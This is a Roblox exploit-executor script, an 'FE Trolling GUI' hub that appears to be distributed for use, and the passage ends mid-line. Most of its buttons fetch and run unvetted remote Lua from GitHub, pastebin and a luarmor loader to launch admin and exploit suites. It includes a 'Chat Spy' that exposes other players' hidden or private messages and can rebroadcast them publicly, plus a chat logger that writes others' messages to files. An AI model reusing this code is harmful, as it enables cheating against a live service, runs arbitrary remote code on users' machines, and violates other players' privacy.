--[[ FE Trolling GUI By Sky/jazminethecooles2001 Last Updated 04/24/2024 added some more FE Scripts, ands Thank you MasterMZ for reviewing! Games Tab: Auto Rap Battles and Fashion Famous If you want me to add anything let me know in the discord or dm me https://discord.gg/xPDF3DkKhk ]]-- httprequest = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request HttpService = game:GetService("HttpService") everyClipboard = setclipboard or toclipboard or set_clipboard or setrbxclipboard or (Clipboard and Clipboard.set) local string = "https://discord.gg/xPDF3DkKhk" local string2 = "https://discord.com/invite/jVf7eSrED9" HttpService = cloneref(game:GetService("HttpService")) or game:GetService("HttpService") UserInputService = game:GetService("UserInputService") VREnabled = game:GetService("VRService").VREnabled local IsOnMobile = table.find({ Enum.Platform.IOS, Enum.Platform.Android }, UserInputService:GetPlatform()) local genesis_supported = game:FindFirstChildOfClass("Players").LocalPlayer.Character:FindFirstChildOfClass("Humanoid").BreakJointsOnDeath if genesis_supported == true then genesis_supported = "Genesis will work on this game! :)" else genesis_supported = "Genesis will sadly not work on this game :(" end local genesis_hats if game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("Unloaded head") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("Extra Right hand (Blocky)_white") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("Extra Left hand (Blocky)_white") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("Front") or game:GetService("Players").LocalPlayer.Character:FindFirstChild("Black") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("LARM") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("RARM") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("Unloaded head") then genesis_hats = "Wearing Paid Hats." elseif game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") and game:GetService("Players").LocalPlayer.Character:FindFirstChild("MeshPartAccessory") then genesis_hats = "Wearing Free Hats." else genesis_hats = "Not wearing any supported hats, please go to the genesis game and go get them." end if IsOnMobile then _G.infydtype = "https://raw.githubusercontent.com/yofriendfromschool1/mobile-delta-inf-yield/main/deltainfyield.txt" else _G.infydtype = "https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source" end local Sky = {} if IsOnMobile then Sky["Ui"] = Instance.new("ScreenGui", gethui()) Sky["Ui"].Name = "skyhubtoggle" Sky["DaIcon"] = Instance.new("ImageButton", Sky["Ui"]) Sky["DaIcon"].Size = UDim2.new(0,45,0,45) Sky["DaIcon"].Position = UDim2.new(.001,0,0.5,0) Sky["DaIcon"].Draggable = true Sky["DaIcon"].Image = "http://www.roblox.com/asset/?id=16710334936" Sky["DaIcon"].BackgroundColor3 = Color3.fromRGB(17, 36, 66) Sky["das"] = Instance.new("UICorner", Sky["DaIcon"]); Sky["das"]["CornerRadius"] = UDim.new(0.20000000298023224, 0); Sky["DaIcon"].MouseButton1Click:Connect(function() for i,v in pairs(game:GetService("CoreGui"):GetDescendants()) do if v.Name == "ScreenGui" then for i,v in pairs(v:GetDescendants()) do if v.Name == "Frame" then v.Visible = true end end end end end) else end local Fluent = loadstring(game:HttpGet("https://github.com/dawid-scripts/Fluent/releases/latest/download/main.lua"))() local SaveManager = loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/Fluent/master/Addons/SaveManager.lua"))() local InterfaceManager = loadstring(game:HttpGet("https://raw.githubusercontent.com/dawid-scripts/Fluent/master/Addons/InterfaceManager.lua"))() local Window = Fluent:CreateWindow({ Title = "FE Trolling GUI", SubTitle = "By Sky/jazminethecooles2001", TabWidth = 160, Size = UDim2.fromOffset(580, 460), Acrylic = false, Theme = "Dark", MinimizeKey = Enum.KeyCode.LeftControl }) local Discord = Window:AddTab({ Title = "Discords", Icon = "globe" }) local Options = Fluent.Options Discord:AddButton({ Title = "Discord Invite", Description = "Copys Discord invite link", Callback = function() if httprequest and not IsOnMobile then httprequest({ Url = 'http://127.0.0.1:6463/rpc?v=1', Method = 'POST', Headers = { ['Content-Type'] = 'application/json', Origin = 'https://discord.com' }, Body = HttpService:JSONEncode({ cmd = 'INVITE_BROWSER', nonce = HttpService:GenerateGUID(false), args = { code = 'xPDF3DkKhk' } }) }) Fluent:Notify({ Title = "if nothing happened", Content = "Make sure u have discord app open", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) elseif everyClipboard then everyClipboard("https://discord.gg/xPDF3DkKhk") Fluent:Notify({ Title = "Copied to clipboard", Content = "", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) else Fluent:Notify({ Title = "DOG SHIT EXECUTOR", Content = "https://discord.gg/xPDF3DkKhk", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) end end }) Discord:AddButton({ Title = "Discord Invite OLD", Description = "Copys OLD Discord invite link", Callback = function() everyClipboard(string2) Fluent:Notify({ Title = "Copied Discord invite link", Content = "", SubContent = "", -- Optional Duration = 5 -- Set to nil to make the notification not disappear }) end }) local Admins = Window:AddTab({ Title = "Admins", Icon = "globe" }) Admins:AddButton({ Title = "Infinite Yield FE", Description = "Infinite Yield FE", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))() end }) Admins:AddButton({ Title = "Infinite Store", Description = "loads a store to browse for plugins for Infinite Yield", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Infinite-Store/Infinite-Store/main/main.lua"))() end }) Admins:AddButton({ Title = "Nameless Admin", Description = "Nameless Admin", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/NamelessAdmin-NO-BYFRON-GUI/main/Source'))() end }) Admins:AddButton({ Title = "Cmd", Description = "Cmd admin", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/lxte/cmd/main/main.lua"))() end }) Admins:AddButton({ Title = "Cmd (TESTING)", Description = "Cmd admin (for tests)", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/lxte/cmd/main/testing-main.lua"))() end }) Admins:AddButton({ Title = "Fates Admin", Description = "Fates Admin", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/fatesc/fates-admin/main/main.lua"))(); end }) Admins:AddButton({ Title = "Shattervast Admin", Description = "Shattervast Admin", Callback = function() loadstring(game:HttpGet('https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub-Backup/main/%5BFE%5D%20Shattervast.lua'))() end }) Admins:AddButton({ Title = "Proton Free Admin", Description = "Proton Free Admin", Callback = function() _G.UI_Id = "default" --set this to "default" for the default ui loadstring(game:HttpGet('https://raw.githubusercontent.com/DigitalityScripts/roblox-scripts/main/Proton%20Free'))() end }) Admins:AddButton({ Title = "Proton 2 free Admin", Description = "Proton 2 free Admin", Callback = function() -- DEFAULT CMD BAR PREFIX IS ; -- DEFAULT CHAT PREFIX IS / _G.UI_Id = "default" --set this to "default" for the default ui loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/5e6e6cc1bb32fd926764d064e2c60a3b.lua"))() end }) Admins:AddButton({ Title = "Reviz Admin V2", Description = "Reviz Admin V2", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/Reviz%20AdminV2"))() end }) local GUIS = Window:AddTab({ Title = "GUIS", Icon = "globe" }) if IsOnMobile or VREnabled then GUIS:AddButton({ Title = "Mobile Keyboard Script", Description = "Since some scripts only have keyboard functions, you will need this script", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/advxzivhsjjdhxhsidifvsh/mobkeyboard/main/main.txt"))() end }) end GUIS:AddButton({ Title = "Sky Hub", Description = "Made by Sky/jazminethecooles2001", Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/yofriendfromschool1/Sky-Hub/main/SkyHub.txt"))() end }) GUIS:AddButton({ Title = "Chat Spy", Description = "only works in some games? see private messages if this doesnt work try IY chatlogs", Callback = function() local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))() local Window = OrionLib:MakeWindow({Name = "Anir Hub", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"}) local Tab = Window:MakeTab({ Name = "Main", Icon = "rbxassetid://4483345998", PremiumOnly = false }) local Section = Tab:AddSection({ Name = "Chat Log's" }) --[[ Name = - The name of the section. ]] OrionLib:MakeNotification({ Name = "From Anir", Content = "U better ont leak it!", Image = "rbxassetid://4483345998", Time = 5 }) --[[ Title = - The title of the notification. Content = - The content of the notification. Image = - The icon of the notification. Time = - The duration of the notfication. ]] --This script reveals ALL hidden messages in the default chat --chat "/spy" to toggle! enabled = true --if true will check your messages too spyOnMyself = true --if true will chat the logs publicly (fun, risky) public = false --if true will use /me to stand out publicItalics = true --customize private logs privateProperties = { Color = Color3.fromRGB(0,255,255); Font = Enum.Font.SourceSansBold; TextSize = 18; } local StarterGui = game:GetService("StarterGui") local Players = game:GetService("Players") local player = Players.LocalPlayer local saymsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("SayMessageRequest") local getmsg = game:GetService("ReplicatedStorage"):WaitForChild("DefaultChatSystemChatEvents"):WaitForChild("OnMessageDoneFiltering") local instance = (_G.chatSpyInstance or 0) + 1 _G.chatSpyInstance = instance local function onChatted(p,msg) if _G.chatSpyInstance == instance then if p==player and msg:lower():sub(1,4)=="/spy" then enabled = not enabled wait(0.3) privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}" StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) elseif enabled and (spyOnMyself==true or p~=player) then msg = msg:gsub("[\n\r]",''):gsub("\t",' '):gsub("[ ]+",' ') local hidden = true local conn = getmsg.OnClientEvent:Connect(function(packet,channel) if packet.SpeakerUserId==p.UserId and packet.Message==msg:sub(#msg-#packet.Message+1) and (channel=="All" or (channel=="Team" and public==false and Players[packet.FromSpeaker].Team==player.Team)) then hidden = false end end) wait(1) conn:Disconnect() if hidden and enabled then if public then saymsg:FireServer((publicItalics and "/me " or '').."{SPY} [".. p.Name .."]: "..msg,"All") else privateProperties.Text = "{SPY} [".. p.Name .."]: "..msg StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) end end end end end for _,p in ipairs(Players:GetPlayers()) do p.Chatted:Connect(function(msg) onChatted(p,msg) end) end Players.PlayerAdded:Connect(function(p) p.Chatted:Connect(function(msg) onChatted(p,msg) end) end) privateProperties.Text = "{SPY "..(enabled and "EN" or "DIS").."ABLED}" StarterGui:SetCore("ChatMakeSystemMessage",privateProperties) local chatFrame = player.PlayerGui.Chat.Frame chatFrame.ChatChannelParentFrame.Visible = true chatFrame.ChatBarParentFrame.Position = chatFrame.ChatChannelParentFrame.Position+UDim2.new(UDim.new(),chatFrame.ChatChannelParentFrame.Size.Y) end }) GUIS:AddButton({ Title = "Chat Logs", Description = "only works in some games? see private messages if this doesnt work try IY chatlogs", Callback = function() if game:service('RunService'):IsStudio() then print('!STUDIO!') else if game:service('CoreGui'):findFirstChild('LogHolder') then return nil end end local LogHolder = Instance.new("ScreenGui") local Logs = Instance.new("Frame") local Scroll = Instance.new("ScrollingFrame") local Template = Instance.new("TextLabel") LogHolder.Name = "LogHolder" if game:service('RunService'):IsStudio() then LogHolder.Parent = game:GetService("Players").LocalPlayer.PlayerGui else LogHolder.Parent = game:GetService("CoreGui") end Logs.Name = "Logs" Logs.Parent = LogHolder Logs.AnchorPoint = Vector2.new(0.5, 0.5) Logs.BackgroundColor3 = Color3.new(1, 1, 1) Logs.Position = UDim2.new(0.200000003, 0, 0.200000003, 0) Logs.Size = UDim2.new(0, 400, 0, 250) Logs.Style = Enum.FrameStyle.DropShadow Scroll.Name = "Scroll" Scroll.Parent = Logs Scroll.BackgroundColor3 = Color3.new(1, 1, 1) Scroll.BackgroundTransparency = 1 Scroll.BorderSizePixel = 0 Scroll.Size = UDim2.new(1, 0, 1, 0) Scroll.CanvasSize = UDim2.new(0, 0, 0, 0) Scroll.ScrollBarThickness = 6 Template.Name = "Template" Template.Parent = Logs Template.BackgroundColor3 = Color3.new(1, 1, 1) Template.BackgroundTransparency = 1 Template.Position = UDim2.new(0, 0, 0, -25) Template.Size = UDim2.new(1, 0, 0, 20) Template.Font = Enum.Font.ArialBold Template.Text = "" Template.TextColor3 = Color3.new(1, 1, 1) Template.TextSize = 15 Template.TextXAlignment = Enum.TextXAlignment.Left Template.TextWrap = true Logs.Active = true Logs.Draggable = true local loggedTable = {} local getTotalSize = function() local totalSize = UDim2.new(0, 0, 0, 0) for i, v in next, loggedTable do totalSize = totalSize + UDim2.new(0, 0, 0, v.Size.Y.Offset) end return totalSize end local BUD = UDim2.new(0, 0, 0, 0) local TotalNum = 0 local function GenLog(txt, colo, time) local oldColo = Color3.fromRGB(0, 0, 0) local Temp = Template:Clone() Temp.Parent = Scroll Temp.Name = txt..'Logged' Temp.Text = tostring(txt) Temp.Visible = true Temp.Position = BUD + UDim2.new(0, 0, 0, 0) if colo then oldColo = colo Temp.TextColor3 = colo elseif not colo then Temp.TextColor3 = Color3.fromRGB(200, 200, 200) end local timeVal = Instance.new('StringValue', Temp) timeVal.Name = 'TimeVal' timeVal.Value = time TotalNum = TotalNum + 1 if not Temp.TextFits then repeat Temp.Size = UDim2.new(Temp.Size.X.Scale, Temp.Size.X.Offset, Temp.Size.Y.Scale, Temp.Size.Y.Offset + 10) Temp.Text = txt until Temp.TextFits end BUD = BUD + UDim2.new(0, 0, 0, Temp.Size.Y.Offset) table.insert(loggedTable, Temp) local totSize = getTotalSize() if totSize.Y.Offset >= Scroll.CanvasSize.Y.Offset then Scroll.CanvasSize = UDim2.new(totSize.X.Scale, totSize.X.Offset, totSize.Y.Scale, totSize.Y.Offset + 100) Scroll.CanvasPosition = Scroll.CanvasPosition + Vector2.new(0, totSize.Y.Offset) end return Temp end local ChatData = "" local function SaveToFile() local t = os.date("*t") local dateDat = t['hour']..' '..t['min']..' '..t['sec']..' '..t['day']..'.'..t['month']..'.'..t['year'] ChatData = "" for i, v in pairs(Scroll:GetChildren()) do ChatData = ChatData..v.TimeVal.Value..' '..v.Text..'\n' end writefile('ChatLogs '..dateDat..'.txt', ChatData) end local function Clear() loggedTable = {} ChatData = "" Scroll.CanvasPosition = Vector2.new(0, 0) for i, v in pairs(Scroll:GetChildren()) do v:Destroy() end Scroll.CanvasSize = UDim2.new(0, 0, 0, 0) BUD = UDim2.new(0, 0, 0, 0) end local LogPlr = function(plr) plr.Chatted:connect(function(msg) local t = os.date("*t") local dateDat = t['hour']..':'..t['min']..':'..t['sec'] if string.len(msg) >= 1000 then return nil end if string.lower(msg) == 'clear' and plr == game:service('Players').LocalPlayer then Clear() return nil end if string.lower(msg) == 'savetofile' and plr == game:service('Players').LocalPlayer then SaveToFile() return nil end if string.sub(msg, 1, 1):match('%p') and string.sub(msg, 2, 2):match('%a') and string.len(msg) >= 5 then GenLog(plr.Name..': '..msg, Color3.new(255, 0, 0), dateDat) else GenLog(plr.Name..': '..msg, Color3.new(255, 255, 255), dateDat) end end) end for i, v in pairs(game:GetService("Players"):GetChildren()) do LogPlr(v) end game:GetService("Players").PlayerAdded:connect(function(plr) LogPlr(plr) end) end }) GUIS:AddButton({ Title = "Arosia FE GUI", Description = "Arosia FE GUI", Callback = function() loadstring(Game:GetObjects("rbxassetid://1255908305")[1].Source)() end }) GUIS:AddButton({ Title = "FE Play animations GUI", Description = "put id animation", Callback = function() function LoadLibrary(a)return loadstring(game:HttpGet("https://pastebin.com/raw/KstdzZVB",true))()end;pcall(function()if getgc then _G.script={}local d=game:GetObjects("rbxassetid://5919309480")[1]_G.script.Parent=d.Frame;d.Parent=game:GetService("CoreGui") end end)if _G.script~=nil then script=_G.script;_G.script=nil end;local e={}function e:FadeInObject(g)game:GetService("TweenService"):Create(g,TweenInfo.new(1,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{TextTransparency=0}):Play()end;function e:SetupObject(g)if g.ClassName=="TextButton"then g.BackgroundTransparency=1;g.TextTransparency=1 end;if g.ClassName=="TextLabel"then g.TextTransparency=1 end;if g.ClassName=="ImageLabel"then g.Size=UDim2.new(0,0,0,0)end end;function e:MoveObjectTo(i,j)j:TweenPosition(i,Enum.EasingDirection.InOut,Enum.EasingStyle.Sine,0.75,true)end;function e:ScaleObjectTo(k,j,l)j:TweenSize(k,Enum.EasingDirection.InOut,Enum.EasingStyle.Sine,l,true)end;function e:SetProperties(j,l,n)game:GetService("TweenService"):Create(j,TweenInfo.new(l,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),n,true):Play()end;local o=game:GetService("UserInputService")local u=script.Parent;local w;local y;local A;local B;local function C(D)local E=D.Position-A;u.Position=UDim2.new(B.X.Scale,B.X.Offset+E.X,B.Y.Scale,B.Y.Offset+E.Y)end;u.InputBegan:Connect(function(D)if D.UserInputType==Enum.UserInputType.MouseButton1 or D.UserInputType==Enum.UserInputType.Touch then w=true;A=D.Position;B=u.Position;D.Changed:Connect(function()if D.UserInputState==Enum.UserInputState.End then w=false end end)end end)u.InputChanged:Connect(function(D)if D.UserInputType==Enum.UserInputType.MouseMovement or D.UserInputType==Enum.UserInputType.Touch then y=D end end)o.InputChanged:Connect(function(D)if D==y and w then C(D)end end)local F={}function F:Dothing(g,speed,G)g.MouseEnter:Connect(function()e:SetProperties(g,speed,{BackgroundTransparency=0.6})end)g.MouseLeave:Connect(function()e:SetProperties(g,G,{BackgroundTransparency=1})end)end;function F:Dosomething(g)e:SetProperties(g,0.2,{BackgroundTransparency=0})end;local H=true;local I=false;local J=false;if H==true then do script.Parent.Side.Credits.BackgroundTransparency=0 end end;script.Parent.Side.Main.MouseButton1Click:Connect(function()H=false;I=true;J=false;e:SetProperties(script.Parent.Side.Credits,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Side.Main,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.Side.bruh,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Transition,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=1})wait(0.6)script.Parent.top.whatframe.Text="Home"e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=0.2})e:SetProperties(script.Parent.Transition,0.2,{BackgroundTransparency=1})script.Parent.Credits.Visible=false;script.Parent.Home.Visible=true;script.Parent.anims.Visible=false end)script.Parent.Side.Credits.MouseButton1Click:Connect(function()H=true;I=false;J=false;e:SetProperties(script.Parent.Side.Credits,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.Side.Main,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Side.bruh,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Transition,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=1})wait(0.6)script.Parent.top.whatframe.Text="Credits"e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=0.2})e:SetProperties(script.Parent.Transition,0.2,{BackgroundTransparency=1})script.Parent.Credits.Visible=true;script.Parent.Home.Visible=false;script.Parent.anims.Visible=false end)script.Parent.Side.bruh.MouseButton1Click:Connect(function()H=false;I=false;J=true;e:SetProperties(script.Parent.Side.Credits,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Side.Main,0.2,{BackgroundTransparency=1})e:SetProperties(script.Parent.Side.bruh,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.Transition,0.4,{BackgroundTransparency=0})e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=1})wait(0.6)script.Parent.top.whatframe.Text="Anims"e:SetProperties(script.Parent.top.whatframe,0.4,{TextTransparency=0.2})e:SetProperties(script.Parent.Transition,0.2,{BackgroundTransparency=1})script.Parent.Credits.Visible=false;script.Parent.Home.Visible=false;script.Parent.anims.Visible=true end)script.Parent.Side.Credits.MouseEnter:Connect(function()if H==false then do e:SetProperties(script.Parent.Side.Credits,0.4,{BackgroundTransparency=0.6})end end end)script.Parent.Side.Credits.MouseLeave:Connect(function()if H==false then do e:SetProperties(script.Parent.Side.Credits,0.2,{BackgroundTransparency=1})end end end)script.Parent.Side.Main.MouseEnter:Connect(function()if I==false then do e:SetProperties(script.Parent.Side.Main,0.4,{BackgroundTransparency=0.6})end end end)script.Parent.Side.Main.MouseLeave:Connect(function()if I==false then do e:SetProperties(script.Parent.Side.Main,0.2,{BackgroundTransparency=1})end end end)script.Parent.Side.bruh.MouseEnter:Connect(function()if J==false then do e:SetProperties(script.Parent.Side.bruh,0.4,{BackgroundTransparency=0.6})end end end)script.Parent.Side.bruh.MouseLeave:Connect(function()if J==false then do e:SetProperties(script.Parent.Side.bruh,0.2,{BackgroundTransparency=1})end end end)script.Parent.Size=UDim2.new(0,0,0,0)script.Parent.loading.Visible=true;e:ScaleObjectTo(UDim2.new(0,656,0,438),script.Parent,0.75)wait(0.8)e:SetProperties(script.Parent.loading.TextLabel,0.3,{TextTransparency=0.2})wait(1)e:SetProperties(script.Parent.loading,0.6,{BackgroundTransparency=1})e:SetProperties(script.Parent.loading.TextLabel,0.6,{TextTransparency=1})script.Parent.top.close.MouseButton1Click:Connect(function()e:SetProperties(script.Parent.loading,0.6,{BackgroundTransparency=0})e:SetProperties(script.Parent.loading.TextLabel,0.6,{TextTransparency=0})wait(1)e:ScaleObjectTo(UDim2.new(0,0,0,0),script.Parent,0.75)wait(0.8)script.Parent:Destroy()end)spawn(function()while true do settings().Physics.AllowSleep=false;game:GetService("Players").LocalPlayer.ReplicationFocus=workspace;setsimulationradius(99999999999999999999999e9*math.huge,99999999999999999999999e9*math.huge)game:GetService("RunService").Heartbeat:wait()end end)function Clickey1()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local K=Player:GetMouse()local L=game:GetService("Players").LocalPlayer.Name;local M=workspace:WaitForChild(L)bloop=false;bloopy=false;M.MeshPartAccessory.Name="HorseyEye"On=true;Off=false;local N=Instance.new("Animation")N.AnimationId="rbxassetid://179224234"local O=Player.Character.Humanoid:LoadAnimation(N)O:AdjustSpeed(1)O:Play()game:GetService("Players").LocalPlayer.Chatted:connect(function(P)if P=="Eyes"then game:GetService("Workspace").Horse:WaitForChild("Head").Attachment69.Position=Vector3.new(0,1,0.575)game:GetService("Workspace").Horse:WaitForChild("Head").Attachment420.Position=Vector3.new(0,1,-0.575)end;if P=="Joust"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;game:GetService("Players").LocalPlayer.Backpack.Foil.Parent=Character;local Q=game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool")Q.Grip=Q.Grip*CFrame.fromEulerAnglesXYZ(math.rad(90),0,0)Q.Parent=game:GetService("Players").LocalPlayer.Backpack;Q.Parent=game:GetService("Players").LocalPlayer.Character;wait(0.1)game:GetService("Players").LocalPlayer.Character=game:GetService("Workspace").Horse;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="Away"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;local Q=game:GetService("Players").LocalPlayer.Character:FindFirstChildOfClass("Tool")Q.Grip=Q.Grip*CFrame.fromEulerAnglesXYZ(math.rad(-90),0,0)Q.Parent=game:GetService("Players").LocalPlayer.Backpack;Q.Parent=game:GetService("Players").LocalPlayer.Character;game:GetService("Players").LocalPlayer.Character.Foil.Parent=game:GetService("Players").LocalPlayer.Backpack;wait(0.1)game:GetService("Players").LocalPlayer.Character=game:GetService("Workspace").Horse;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="No Eyes"then game:GetService("Workspace").Horse:WaitForChild("Head").Attachment69.Position=Vector3.new(0,0,0)game:GetService("Workspace").Horse:WaitForChild("Head").Attachment420.Position=Vector3.new(0,0,0)end;if P=="Wander"then bloopy=false;game:GetService("Players").LocalPlayer.Character=game:GetService("Workspace").Horse;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if P=="Back"then bloopy=true;game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=M.Humanoid;wait(0.1)game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=M.Humanoid;wait(0.1)game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=M.Humanoid end;if P=="Off"then bloop=true;bloopy=true;On=false;M.Humanoid.HipHeight=0;game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;O:Stop()end;if P=="On"then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;bloop=false;bloopy=false;On=true;M.Humanoid.HipHeight=1.5;O:Play()wait(0.1)game:GetService("Players").LocalPlayer.Character=game:GetService("Workspace").Horse;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character;coroutine.resume(coroutine.create(function()while On do game:GetService("RunService").Heartbeat:wait()M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)M.HumanoidRootPart.CFrame=game:GetService("Workspace").Horse.Body.CFrame+Vector3.new(0,2,0)end end))end end)local R={horsebody=Character:WaitForChild("Bang w bun"),horseneck=Character:WaitForChild("Kate Hair"),horserightleg=Character:WaitForChild("Pal Hair"),horseleftleg=Character:WaitForChild("Pink Hair"),horserightarm=Character:WaitForChild("LavanderHair"),horseleftarm=Character:WaitForChild("Hat1"),horsetail=Character:WaitForChild("Vets Day Cap"),horsehead=Character:WaitForChild("Robloxclassicred")}local S={horseeye=Character:WaitForChild("HorseyEye"),horseeye2=Character:WaitForChild("MeshPartAccessory")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=2500;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=2500 end;function sandbox(a3,a4)local a5=getfenv(a4)local a6=setmetatable({},{__index=function(self,O)if O=="script"then return a3 else return a5[O]end end})setfenv(a4,a6)return a4 end;cors={}mas=Instance.new("Model",game:GetService("Lighting"))Model0=Instance.new("Model")UnionOperation1=Instance.new("UnionOperation")UnionOperation2=Instance.new("UnionOperation")UnionOperation3=Instance.new("UnionOperation")Motor6D4=Instance.new("Motor6D")Motor6D5=Instance.new("Motor6D")UnionOperation6=Instance.new("UnionOperation")UnionOperation7=Instance.new("UnionOperation")UnionOperation8=Instance.new("UnionOperation")UnionOperation9=Instance.new("UnionOperation")Motor6D10=Instance.new("Motor6D")UnionOperation11=Instance.new("UnionOperation")UnionOperation12=Instance.new("UnionOperation")Motor6D13=Instance.new("Motor6D")Motor6D14=Instance.new("Motor6D")Motor6D15=Instance.new("Motor6D")Motor6D16=Instance.new("Motor6D")Motor6D17=Instance.new("Motor6D")Motor6D18=Instance.new("Motor6D")Motor6D19=Instance.new("Motor6D")UnionOperation20=Instance.new("UnionOperation")UnionOperation21=Instance.new("UnionOperation")Motor6D22=Instance.new("Motor6D")UnionOperation23=Instance.new("UnionOperation")Motor6D24=Instance.new("Motor6D")Seat25=Instance.new("Seat")Humanoid26=Instance.new("Humanoid")Folder27=Instance.new("Folder")Animation28=Instance.new("Animation")Animation29=Instance.new("Animation")Animation30=Instance.new("Animation")Animation31=Instance.new("Animation")Folder32=Instance.new("Folder")Script33=Instance.new("Script")Script34=Instance.new("Script")LocalScript35=Instance.new("LocalScript")ObjectValue36=Instance.new("ObjectValue")ScreenGui37=Instance.new("ScreenGui")TextLabel38=Instance.new("TextLabel")Model0.Name="Horse"Model0.Parent=mas;UnionOperation1.Name="Bridle"UnionOperation1.Parent=Model0;UnionOperation1.CFrame=CFrame.new(-49.9946136,5.63413048,18.9536285,5.81264548e-09,4.23944257e-09,1,0.999998152,2.23517418e-07,-5.81264015e-09,-2.23517418e-07,0.999998152,-4.23950297e-09)UnionOperation1.Orientation=Vector3.new(0,90,90)UnionOperation1.Position=Character.Torso.Position;UnionOperation1.Rotation=Vector3.new(90,90,0)UnionOperation1.Color=Color3.new(0.105882,0.164706,0.207843)UnionOperation1.Size=Vector3.new(1.41772509,1.52062428,1.1000247)UnionOperation1.BrickColor=BrickColor.new("Black")UnionOperation1.CanCollide=f